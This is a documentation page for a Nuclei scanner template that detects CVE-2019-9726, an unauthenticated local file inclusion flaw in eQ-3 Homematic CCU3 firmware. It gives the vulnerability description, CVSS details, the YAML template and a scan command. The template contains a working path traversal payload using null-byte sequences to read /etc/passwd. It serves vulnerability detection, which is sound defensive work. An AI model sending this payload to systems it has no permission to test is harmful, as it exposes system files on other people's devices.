Skip to content
Nuclei Templates

Homematic CCU3 - Local File Inclusion

ID: CVE-2019-9726

Severity: high

Author: 0x_Akoko

Tags: cve2019,cve,homematic,lfi,eq-3

Description

Section titled “Description”

eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device’s filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.

YAML Source

Section titled “YAML Source”
id: CVE-2019-9726


info:
  name: Homematic CCU3 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor.
  reference:
    - https://atomic111.github.io/article/homematic-ccu3-fileread
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9726
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9726
    cwe-id: CWE-22
    epss-score: 0.03616
    epss-percentile: 0.91664
    cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: eq-3
    product: ccu3_firmware
  tags: cve2019,cve,homematic,lfi,eq-3


http:
  - method: GET
    path:
      - "{{BaseURL}}/.%00./.%00./etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "bin:.*:0:0:"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a0047304502207cf3742b46656c00594994bbec01cf47befb176928792e809b964bc9de0ee9de0221009e3fab6f2971c9b67d35841f940f053e4f057c4df532a10cf077eabf6fa12331:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-9726.yaml"

View on Github